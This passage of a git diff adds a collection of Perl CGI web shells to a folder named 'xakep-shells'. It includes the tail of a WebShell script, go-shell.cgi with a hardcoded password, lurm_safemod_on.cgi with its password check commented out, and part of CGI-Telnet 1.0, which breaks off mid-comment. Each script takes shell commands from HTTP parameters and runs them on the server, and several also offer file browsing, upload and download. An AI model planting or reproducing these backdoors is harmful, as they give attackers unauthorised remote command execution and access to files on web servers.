+    elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
+        return { id => 'print', variable => $1, format => $4 };
+    }
+    else {
+        die "invalid command: '$command'";
+    }
+}
+
+sub compile {
+    my ($self, $statements) = @_;
+    my $operation = $self->compile_sequence($statements);
+    if (scalar(@$statements)) {
+        my $statement = shift(@$statements);
+        my $id = $statements->{id};
+        die "unexpected statement: '$id'";
+    }
+    return $operation;
+}
+
+sub compile_sequence {
+    my ($self, $statements) = @_;
+    my $operations = [];
+    while (scalar(@$statements) > 0) {
+        my $id = $statements->[0]->{id};
+        if ($id eq 'if') {
+            push @$operations, $self->compile_condition($statements);
+        }
+        elsif ($id eq 'for') {
+            push @$operations, $self->compile_loop($statements);
+        }
+        elsif ($id eq 'print' or $id eq 'text') {
+            my $statement = shift @$statements;
+            push @$operations, $statement;
+        }
+        else {
+            last;
+        }
+    }
+    return { id => 'sequence', operations => $operations };
+}
+
+sub compile_condition {
+    my ($self, $statements) = @_;
+    my $conditions = [];
+    my $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
+        my $test = $id ne 'else' ? $statement->{test} : undef;
+        my $operation = $self->compile_sequence($statements);
+        push @$conditions, { test => $test, operation => $operation };
+        $statement = shift @$statements;
+        $id = defined $statement ? $statement->{id} : 'none';
+    }
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'condition', conditions => $conditions };
+}
+
+sub compile_loop {
+    my ($self, $statements) = @_;
+    my $statement = shift @$statements;
+    my $name = $statement->{name};
+    my $list = $statement->{list};
+    my $operation = $self->compile_sequence($statements);
+    $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'loop',
+        name => $name, list => $list, operation => $operation };
+}
+
+sub evaluate {
+    my ($self, $operation, $keywords) = @_;
+    $keywords->{loop} = {};
+    my $chunks = $self->evaluate_operation($operation, $keywords);
+    return join('', @$chunks);
+}
+
+sub evaluate_operation {
+    my ($self, $operation, $keywords) = @_;
+    if ($operation->{id} eq 'condition') {
+        return $self->evaluate_condition($operation->{conditions}, $keywords);
+    }
+    elsif ($operation->{id} eq 'loop') {
+        return $self->evaluate_loop($operation->{name}, $operation->{list},
+                $operation->{operation}, $keywords);
+    }
+    elsif ($operation->{id} eq 'print') {
+        return $self->evaluate_print($operation->{variable},
+                $operation->{format}, $keywords);
+    }
+    elsif ($operation->{id} eq 'sequence') {
+        my $chunks = [];
+        push @$chunks, @{$self->evaluate_operation($_, $keywords)}
+                for (@{$operation->{operations}});
+        return $chunks;
+    }
+    elsif ($operation->{id} eq 'text') {
+        return [$operation->{text}];
+    }
+}
+
+sub evaluate_condition {
+    my ($self, $conditions, $keywords) = @_;
+    for my $condition (@$conditions) {
+        my $test = $condition->{test};
+        my $value = defined $test ?
+                $self->evaluate_variable($test, $keywords) : 1;
+        return $self->evaluate_operation($condition->{operation}, $keywords)
+                    if $value;
+    }
+    return [];
+}
+
+sub evaluate_loop {
+    my ($self, $name, $list, $operation, $keywords) = @_;
+    my $values = $self->evaluate_variable($list, $keywords);
+    my $length = scalar(@$values);
+    my $index = 0;
+    my $chunks = [];
+    for my $value (@$values) {
+        $keywords->{$name} = $value;
+        $keywords->{loop}->{$name} = {
+            index => $index, number => $index+1,
+            first => $index == 0, last => $index == $length-1,
+            odd => $index % 2 == 1, even => $index % 2 == 0,
+        };
+        push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
+        $index++;
+    }
+    delete $keywords->{$name};
+    delete $keywords->{loop}->{$name};
+    return $chunks;
+}
+
+sub evaluate_print {
+    my ($self, $variable, $format, $keywords) = @_;
+    my $value = $self->evaluate_variable($variable, $keywords);
+    if ($format eq 'html') {
+        for ($value) { s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; }
+    }
+    elsif ($format eq 'nbsp') {
+        for ($value) {
+            s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; s/ /&nbsp;/g;
+        }
+    }
+    elsif ($format eq 'url') {
+        $value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
+    }
+    elsif ($format ne '') {
+        
+        die "unknown format: '$format'";
+    }
+    return [$value];
+}
+
+sub evaluate_variable {
+    my ($self, $variable, $keywords) = @_;
+    my $value = $keywords;
+    for my $name (split(/\./, $variable)) {
+        $value = $value->{$name};
+    }
+    return $value;
+}
+
+###############################################################################
+
+package WebShell::Script;
+
+use CGI;
+use CGI::Carp qw(fatalsToBrowser);
+use IPC::Open3;
+use Cwd;
+use POSIX;
+
+sub new {
+    my ($class) = @_;
+    my $self = bless { }, $class;
+    $self->initialize();
+    return $self;
+}
+
+sub query {
+    my ($self, @names) = @_;
+    my @values = ();
+    for my $name (@names) {
+        my $value = $self->{cgi}->param($name);
+        for ($value) { s/^\s+//; s/\s+$//; }
+        push @values, $value;
+    }
+    return wantarray ? @values : "@values";
+}
+
+sub initialize {
+    my ($self) = @_;
+    $self->{cgi} = new CGI;
+    $self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
+    $self->{cwd} = cwd unless defined $self->{cwd};
+    $self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
+    $self->{login} = 0;
+    my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
+    my $password = $self->query('password');
+    $self->{login} = 1
+            if crypt($WebShell::Configuration::password, $login."XX") eq $login;
+    $self->{login} = 1 if $password eq $WebShell::Configuration::password;
+}
+
+sub run {
+    my ($self) = @_;
+    return $self->login_action unless $self->{login};
+    my $action = $self->query('action');
+    $action = 'default' unless $action =~ /^\w+$/;
+    $action = $self->can($action . '_action');
+    $action = $self->can('default_action') unless defined $action;
+    $self->$action();
+}
+
+sub default_action {
+    my ($self) = @_;
+    $self->publish('INPUT');
+}
+
+sub login_action {
+    my ($self) = @_;
+    $self->publish('LOGIN', error => ($self->query('password') ne ''));
+}
+
+sub command {
+    my ($self, $command) = @_;
+    chdir($self->{cwd});
+    my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
+    print WRTH "$command\n";
+    close(WRTH);
+    my $output = do { local $/; <RDH> };
+    my $error = do { local $/; <ERRH> };
+    waitpid($pid, 0);
+    return ($output, $error);
+}
+
+sub forbidden_command {
+    my ($self, $command) = @_;
+    my $error = "This command is not available in the restricted mode.\n";
+    $error .= "You may only use the following commands:\n";
+    for my $ok_command (@$WebShell::Configuration::ok_commands) {
+        $error .= "    $ok_command\n";
+    }
+    return ('', $error);
+}
+
+sub cd_command {
+    my ($self, $command) = @_;
+    my $error;
+    my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
+    warn "cwd: '$self->{cwd}'\n";
+    warn "command: '$command'\n";
+    warn "directory: '$directory'\n";
+    if ($directory ne '') {
+        $error = $! unless chdir($self->{cwd});
+        $error = $! unless chdir($directory);
+    }
+    $self->{cwd} = cwd;
+    return ('', $error);
+}
+
+sub execute_action {
+    my ($self) = @_;
+    my $command = $self->query('command');
+    my $user = getpwuid($>);
+    my $old_line = "[$user: $self->{cwd}]\$ $command";
+    my ($output, $error);
+    if ($command ne "") {
+        my $allow = not $WebShell::Configuration::restricted_mode;
+        for my $ok_command (@$WebShell::Configuration::ok_commands) {
+            $allow = 1 if $command eq $ok_command;
+        }
+        if ($allow) {
+            $command =~ /^(\w+)/;
+            if (my $method = $self->can("${1}_command")) {
+                ($output, $error) = $self->$method($command);
+            }
+            else {
+                ($output, $error) = $self->command($command);
+            }
+            
+        }
+        else {
+            ($output, $error) = $self->forbidden_command($command);
+        }
+    }
+    my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
+    $self->publish('EXECUTE',
+        old_line => $old_line, new_line => $new_line,
+        output => $output, error => $error);
+}
+
+sub browse_action {
+    my ($self) = @_;
+    my $error = "";
+    my $path = $self->query('path');
+    if ($WebShell::Configuration::restricted_mode and $path ne '') {
+        $error = "You cannot browse directories in the restricted mode.";
+        $path = "";
+    }
+    $error = $! unless chdir($self->{cwd});
+    if ($path ne '') {
+        $error = $! unless chdir($path);
+    }
+    $self->{cwd} = cwd;
+    opendir(DIR, '.');
+    my @dir = readdir(DIR);
+    closedir(DIR);
+    my @entries = ();
+    for my $name (@dir) {
+        my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
+            $atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
+        my $modestr = S_ISDIR($mode) ? 'd' : '-';
+        $modestr .= ($mode & S_IRUSR) ? 'r' : '-';
+        $modestr .= ($mode & S_IWUSR) ? 'w' : '-';
+        $modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
+        $modestr .= ($mode & S_IRGRP) ? 'r' : '-';
+        $modestr .= ($mode & S_IWGRP) ? 'w' : '-';
+        $modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
+        $modestr .= ($mode & S_IROTH) ? 'r' : '-';
+        $modestr .= ($mode & S_IWOTH) ? 'w' : '-';
+        $modestr .= ($mode & S_IXOTH) ? 'x' : '-';
+        my $userstr = getpwuid($uid);
+        my $groupstr = getgrgid($gid);
+        my $sizestr = ($size < 1024) ? $size :
+                        ($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
+                        sprintf("%.1fM", $size/(1024*1024));
+        my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
+        push @entries, {
+            name => $name,
+            type_file => S_ISREG($mode),
+            type_dir => S_ISDIR($mode),
+            type_exec => ($mode & S_IXUSR),
+            mode => $modestr,
+            user => $userstr,
+            group => $groupstr,
+            order => (S_ISDIR($mode) ? 0 : 1) . $name,
+            all_rights => (-w $name),
+            size => $sizestr,
+            time => $timestr,
+        };
+    }
+    @entries = sort { $a->{order} cmp $b->{order} } @entries;
+    my @directory = ();
+    my $path = '';
+    for my $name (split m|/|, $self->{cwd}) {
+        $path .= "$name/";
+        push @directory, {
+            name => $name,
+            path => $path,
+        };
+    }
+    @directory = ({ name => '', path => '/'}) unless @directory;
+    $self->publish('BROWSE', entries => \@entries, directory => \@directory,
+            error => $error);
+}
+
+sub publish {
+    my ($self, $template, %keywords) = @_;
+    $template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
+    my $xit = new WebShell::MiniXIT;
+    my $text = $xit->substitute($template, %keywords);
+    $self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
+    my $domain = $1;
+    my $path = $2;
+    my $cwd_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-cwd',
+        -value => $self->{cwd},
+        -domain => $domain,
+        -path => $path,
+    );
+    my $login = "";
+    if ($self->{login}) {
+        my $salt = join '',
+                ('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
+        $login = crypt($WebShell::Configuration::password, $salt);
+    }
+    my $login_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-login',
+        -value => $login,
+        -domain => $domain,
+        -path => $path,
+    );
+    print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
+    print $text;
+}
+
+###############################################################################
+
+package WebShell;
+
+my $script = new WebShell::Script;
+$script->run;
+
+###############################################################################
+###############################################################################
diff --git a/xakep-shells/CGI/go-shell.cgi.txt b/xakep-shells/CGI/go-shell.cgi.txt
new file mode 100644
index 0000000..e7510b2
--- /dev/null
+++ b/xakep-shells/CGI/go-shell.cgi.txt
@@ -0,0 +1,87 @@
+#!/usr/bin/perl
+
+#change this password; for power security - delete this file =)
+$pwd='adm';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+if (!defined$param{pwd}){$param{pwd}='ter'};
+
+print << "[kalabanga]";
+<head>
+<title>GO.cgi</title>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Current request is:
+<table width=100% bgcolor=D9D9D9><tr><td>
+[kalabanga]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[kalabanga]";
+</td></tr></table>
+Answer for current request is:
+<table width=100% bgcolor=D9D9D9><tr><td><pre>
+[kalabanga]
+
+if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
+else {
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+};
+
+print << "[kalabanga]";
+</pre></td></tr></table>
+<form action=go.cgi>
+Password:
+<input type=text class="TEXT" name=pwd value=$param{pwd}>
+Dir for next request:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+next request:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[kalabanga]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
\ No newline at end of file
diff --git a/xakep-shells/CGI/lurm_safemod_on.cgi.txt b/xakep-shells/CGI/lurm_safemod_on.cgi.txt
new file mode 100644
index 0000000..a072668
--- /dev/null
+++ b/xakep-shells/CGI/lurm_safemod_on.cgi.txt
@@ -0,0 +1,94 @@
+#!/usr/bin/perl
+############################################################
+## Network security team                                  ##
+############################################################
+##Coder: Ins                                              ##
+############################################################
+##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
+############################################################
+
+#V celjah nesankcionirovannogo dostupa smeni etot parol`"
+#$pwd='';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
+
+print << "[ins1]";
+<head>
+<title>::Network Security Team::</title>
+<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
+<font size=-2 face=verdana><br><br>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Vvedite zapros:
+<table width=500 bgcolor=D9D9D9><tr><td>
+[ins1]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[ins2]";
+</td></tr></table>
+Otvet na zapros:
+<table width=500 bgcolor=D9D9D9><tr><td><pre>
+[ins2]
+
+#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+
+print << "[ins3]";
+</pre></td></tr></table>
+<form action=pshell.cgi>
+DIR dlja sledujushego zaprosa:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+Sledujushij zapros:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[ins3]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
+
+#########################<<KONEC>>#####################################
\ No newline at end of file
diff --git a/xakep-shells/CGI/telnet.cgi.txt b/xakep-shells/CGI/telnet.cgi.txt
new file mode 100644
index 0000000..15e062c
--- /dev/null
+++ b/xakep-shells/CGI/telnet.cgi.txt
@@ -0,0 +1,697 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "";         # Change this. You will need to enter this
+                                # to login.
+
+$WinNT = 0;                     # You need to change the value of this to 1 if
+                                # you're running this script on a Windows NT
+                                # machine. If you're running it on Unix, you
+                                # can leave the value as it is.
+
+$NTCmdSep = "&";                # This character is used to seperate 2 commands
+                                # in a command line on Windows NT.
+
+$UnixCmdSep = ";";              # This character is used to seperate 2 commands
+                                # in a command line on Unix.
+
+$CommandTimeoutDuration = 100000;   # Time in seconds after commands will be killed
+                                # Don't set this to a very large value. This is
+                                # useful for commands that may hang or that
+                                # take very long to execute, like "find /".
+                                # This is valid only on Unix servers. It is
+                                # ignored on NT Servers.
+
+$ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
+                                # browser as soon as it is output, otherwise
+                                # it is buffered and send when the command
+                                # completes. This is useful for commands like
+                                # ping, so that you can see the output as it
+                                # is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse
+{
+        local (*in) = @_ if @_;
+        local ($i, $loc, $key, $val);
+
+        $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+        if($ENV{'REQUEST_METHOD'} eq "GET")
+        {
+                $in = $ENV{'QUERY_STRING'};
+        }
+        elsif($ENV{'REQUEST_METHOD'} eq "POST")
+        {
+                binmode(STDIN) if $MultipartFormData & $WinNT;
+                read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+        }
+
+        # handle file upload data
+        if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+        {
+                $Boundary = '--'.$1; # please refer to RFC1867
+                @list = split(/$Boundary/, $in);
+                $HeaderBody = $list[1];
+                $HeaderBody =~ /\r\n\r\n|\n\n/;
+                $Header = $`;
+                $Body = $';
+                $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+                $in{'filedata'} = $Body;
+                $Header =~ /filename=\"(.+)\"/;
+                $in{'f'} = $1;
+                $in{'f'} =~ s/\"//g;
+                $in{'f'} =~ s/\s//g;
+
+                # parse trailer
+                for($i=2; $list[$i]; $i++)
+                {
+                        $list[$i] =~ s/^.+name=$//;
+                        $list[$i] =~ /\"(\w+)\"/;
+                        $key = $1;
+                        $val = $';
+                        $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+                        $val =~ s/%(..)/pack("c", hex($1))/ge;
+                        $in{$key} = $val;
+                }
+        }
+        else # standard post data (url encoded, not multipart)
+        {
+                @in = split(/&/, $in);
+                foreach $i (0 .. $#in)
+                {
+                        $in[$i] =~ s/\+/ /g;
+                        ($key, $val) = split(/=/, $in[$i], 2);
+                        $key =~ s/%(..)/pack("c", hex($1))/ge;
+                        $val =~ s/%(..)/pack("c", hex($1))/ge;
+                        $in{$key} .= "\0" if (defined($in{$key}));
+                        $in{$key} .= $val;
+                }
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+        $EncodedCurrentDir = $CurrentDir;
+        $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+        print "Content-type: text/html\n\n";
+        print <<END;
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to
+$ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+        $Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab
+Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font
+color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font
+color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font
+color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font
+color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          /
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+        print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+        print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+        print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+        @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+        foreach $cookie(@httpcookies)
+        {
+                ($id, $val) = split(/=/, $cookie);
+                $Cookies{$id} = $val;
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+        print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+        print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+        &PrintPageHeader("p");
+        &PrintLogoutScreen;
+        &PrintLoginScreen;
+        &PrintLoginForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin
+{
+        if($LoginPassword eq $Password) # password matched
+        {
+                print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+                &PrintPageHeader("c");
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+        }
+        else # password didn't match
+        {
+                &PrintPageHeader("p");
+                &PrintLoginScreen;
+                if($LoginPassword ne "") # some password was entered
+                {
+                        &PrintLoginFailedMessage;
+                }
+                &PrintLoginForm;
+                &PrintPageFooter;
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+        if(!$WinNT)
+        {
+                alarm(0);
+                print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+                exit;
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
